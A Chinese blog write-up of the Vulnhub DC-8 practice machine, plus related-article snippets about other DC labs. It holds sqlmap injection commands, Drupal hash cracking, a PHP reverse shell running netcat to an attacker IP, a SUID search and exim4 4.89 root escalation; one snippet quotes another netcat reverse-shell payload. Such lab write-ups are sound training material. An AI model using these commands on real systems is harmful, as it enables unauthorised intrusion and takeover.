[vulhub靶机通关]DC-8

最新推荐文章于 2025-12-03 18:56:16 发布
原创 最新推荐文章于 2025-12-03 18:56:16 发布 · 174 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web安全 #网络 #网络安全

信息收集

主机探测

端口扫描

访问页面 发现可能存在sql注入

用sqlmap跑一下

sqlmap -u "http://192.168.89.154/?nid=1'" --batch --dbs

爆表

sqlmap -u "http://192.168.89.154/?nid=1'"  -D "d7db" --tables

这么多 查一下users的

将密码复制下来 因为前面探测到了是drupal的cms kali上专门的爆破工具 john

john 1.txt

获得了john的密码

弹一个shell


<?php
exec("nc -e /bin/bash 192.168.89.132 4567");
?>

查找可以提权的文件

find / -perm -4000 -type f 2>/dev/null

有exim4

查找版本

4.89 我们在msf中查找对应的exp

让靶机下载这个

之前已经下载过了 具体步骤为将该文件 移动到

/var/html/www

目录下 kali开启apache

根据手册 命令为 ./46996.sh -m netcat

在root目录里找到flag

Vulhub-DC-5靶场通关攻略
qq_65852138的博客
04-14 1706
一个一个尝试访问,发现thankyou.php发现存在年份显示变化,随着我们的刷新,年份会一直变化。之后在kali中文件所在目录执行传输命令,只知道靶机的connect后面出现数字就算传输成功。包含/etc/passwd文件验证,当然可以多试几个目录,难免有被过滤的文件。编译的时候如果你的kali版本过高,那么就会使用更高级的GLIBC库进行编译。在url后面拼接file=的时候,这个年份便不再显示,至此判断存在文件上传。至于是什么上传方式,这里可以注意下之前扫描端口的时候有一个nginx的服务。
Vulnhub靶机:DC-8渗透详细过程
IerkeU的博客
03-28 3229
DC-8 前情提要 靶场地址:https://www.vulnhub.com/entry/dc-8,367/ DC-8是一个中级的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具) 翻译一下官方给出的一些信息: 这个挑战试图证明在 Linux 上安装和配置的双重身份验证是否可以防止 Linux 服务器被攻击。这个挑战的最终目标是绕过双重身份验证,获取根并读取唯一标志。除非您尝试通过SSH登录,否则您可能甚至不知道安装和配置了双重身份验
[vulhub靶机通关]DC-1(suid提权)
woxinweizhou的博客
11-04 167
摘要:本实验记录了针对DC1靶机的渗透测试过程。通过nmap扫描确定目标IP和开放端口,利用Drupal漏洞获取初始权限。发现数据库凭证后,修改管理员密码登录后台。利用find命令的SUID权限进行提权,最终在系统目录中获取全部4个flag。实验展示了从信息收集、漏洞利用到权限提升的完整渗透流程。
Vulhub-DC-1靶场通关攻略
weixin_51339377的博客
03-16 4001
靶场环境配置: 修改为usb1.0同时新建网络,把网络修改为NAT即可 首先开启靶机环境和kali黑客机器环境 通过NAT模式可以保证两者处于同一个内网环境中 切记 vmware和virtualbox的虚拟网卡可能网段不同 所以要保证kali和靶机在同一个网段 否则无法扫描到相应的靶机 1.第一步 通过kali中自带的一个工具 arp-scan进行内网存活主机探测 arp-scan -l 2.接下来可以借助nmap对目标进行扫描 其中 -sV服务指纹识别 可以探测目标系统...
[vulhub靶机通关]DC-6(命令执行_nmap提权)
woxinweizhou的博客
11-06 159
寻找了一番 找到一个可以进行命令执行的页面 用bp进行抓包。我们在后面追加/bin/bash获得jens的shell。sudo -l 提示backups.sh无命令可以执行。在home/mark目录下找到了 graham的密码。os.execute()相当于system()用自带的wpscan 扫描网站的用户名。我们复制过来 同时将得到的用户名复制。用nc反弹一个shell给kali。是cms wordpress。我们试着su能不能su进去。发现nmap有root权限。在kali上开启监听。
[vulhub靶机通关]DC-4(hydra爆破_exim4_teehee提权)
woxinweizhou的博客
11-05 220
摘要:通过主机探测和端口扫描发现目标系统漏洞,利用爆破获取登录密码"happy"。在命令执行页面抓包修改参数,成功反弹shell到Kali。使用SUID提权技术,通过exim4漏洞获取root权限。此外还发现teehee提权方法,修改/etc/passwd文件创建特权用户。整个渗透过程涉及信息收集、漏洞利用、权限提升等多个环节,最终在两处获取系统flag。
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-8 通关详解 (附靶机搭建教程)
qq_51577576的博客
10-27 1890
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-8 通关详解 (附靶机搭建教程) 从信息收集到拿到低权限,最后提权获取最高权限,详细解读
[vulhub靶机通关]DC-2(rbash绕过_git提权)
woxinweizhou的博客
11-04 290
本文记录了DC-2靶机的渗透测试过程。首先通过nmap扫描发现80和7744端口开放,在网站中发现flag1提示使用cewl工具。使用wpscan扫描获得用户名,结合cewl生成的字典爆破出jerry和tom的SSH密码。通过SSH登录后绕过rbash限制,发现flag3提示切换用户。在jerry目录找到flag4后,利用git提权获得root权限,最终获取到root目录下的flag。整个过程涉及主机探测、CMS扫描、密码爆破、rbash绕过和git提权等技术。
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-9 通关详解 (附靶机搭建教程)
qq_51577576的博客
10-28 2188
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-8 通关详解 (附靶机搭建教程) 从信息收集到拿到低权限,最后提权获取最高权限,详细解读
VulnHub靶机 DC-系列合集 通关攻略手册
网络空间安全学习
04-27 814
VulnHub靶机 DC系列靶机 通关攻略手册。
(VulnHub靶机通关DC-9
yang1234567898的博客
01-23 950
靶机下载地址:https://download.vulnhub.com/dc/DC-9.zip 主机发现 IP:192.168.43.192 80端口为开放状态,22端口是filtered状态 web渗透 访问80端口的web服务,打开Search界面,输入1' or 1=1 # 存在sql注入 burpsuite抓包然后保存为DC.txt,然后用sqlmap进行爆破 爆库名 python sqlmap.py -r "C:\Users\11989\Desktop\DC.
Vulhub-DC-4靶场实战攻略
weixin_51339377的博客
03-16 1817
靶场DC-4和前面DC-1和2相同的网络配置 只有DC-3比较特别 需要重新调配相应的环境 arp-scan -l nmap -T4 -A 192.168.206.130 -p 1-65535 http://192.168.206.130 可以借助工具burpsuite进行暴力破解 由于非常智障 这里不多赘述 结果 用户名 admin 密码happy nc+192.168.206.128+9999+-e+/bin/bash nc -lvp 9999 ...
CDN:从“网络加速器”到“网络安全盾”的进化之路
qq_46950007的博客
11-30 456
在大多数人的印象中,零九CDN(内容分发网络)的核心使命是 “加速”——让网页加载更快,让视频播放更流畅。这无疑是它诞生之初被赋予的神圣职责。然而,在当今这个网络攻击频发、安全威胁无处不在的时代,CDN的角色已经悄然发生了深刻的演变。它不再仅仅是互联网世界的“超级快递网”,更已进化成为守护网站安全的 “前沿防御盾”。
什么是网络安全网络安全包括哪几个方面?学完能做一名黑客吗?
weixin_57514792的博客
12-03 921
什么是网络安全网络安全包括哪几个方面?学完能做一名黑客吗?
网络安全(黑客技术)—2025自学手册
2401_84760527的博客
11-24 1613
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
网络安全系列:系统后门与持久化技术深度解析
PyHaVolask的博客
12-03 755
本文系统阐述渗透测试中维持访问权限的核心技术,详细解析服务绑定、注册表自启动等持久化机制,涵盖Certutil/Bitsadmin远程下载、Meterpreter进程迁移与痕迹清理等高级操作,并提供完整的防御检测与应急响应方案,强调技术沉淀与合法授权的重要性。
远程桌面提权漏洞复现:原理详解+环境搭建+渗透实战(CVE-2019-0708
mooyuan的网络安全博客
11-25 1233
本文分析了CVE-2019-0708(BlueKeep)远程桌面提权漏洞,该漏洞影响Windows旧版本系统,攻击者可通过RDP协议远程执行任意代码。文章详细介绍了漏洞原理、影响范围及防范措施,重点演示了利用Metasploit框架进行渗透测试的全过程,包括环境搭建、漏洞探测、模块配置、攻击实施及后渗透操作(创建管理员账号、远程连接等)。通过实验验证了该漏洞的严重性,强调及时打补丁和采取防护措施的重要性。
AI驱动的网联自动驾驶汽车网络安全测试方法
最新发布
NewCarRen的博客
12-03 806
本文综述了网联自动驾驶汽车(CAV)网络安全测试面临的挑战与解决方案。随着CAV普及,网络攻击风险加剧,现有渗透测试方法面临测试环境成本高、专业人才匮乏等挑战。研究表明,人工智能(AI)在传统行业渗透测试中展现出缩短时间、提高效率的优势,但在CAV领域应用仍存在明显缺口。文章重点分析了强化学习等AI算法在渗透测试中的应用潜力,指出创建仿真环境是测试AI模型有效性的可行方案。开源工具VEINS被推荐为合适的仿真平台,其Python/C++接口便于AI模型集成。研究认为,若证实AI方法有效,可扩展应用于完整CA
2025年第二届全国网络安全行业赛-电子取证师初赛(第一批27号)
Aluxian_的博客
12-03 798
2025年全国网络安全行业赛电子取证师初赛题目摘要:比赛包含手机、U盘和流量包三类检材分析。手机检材涉及记账APP包名、转账记录、会议号等信息提取;U盘检材需破解压缩包密码并分析加密容器;流量包检材要求分析攻击IP、端口、密码等入侵痕迹。题目涵盖电子取证常见场景,考察参赛者的综合分析能力,包括数据恢复、密码破解、日志分析等专业技能。完整赛题及解析可关注鱼影安全获取。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值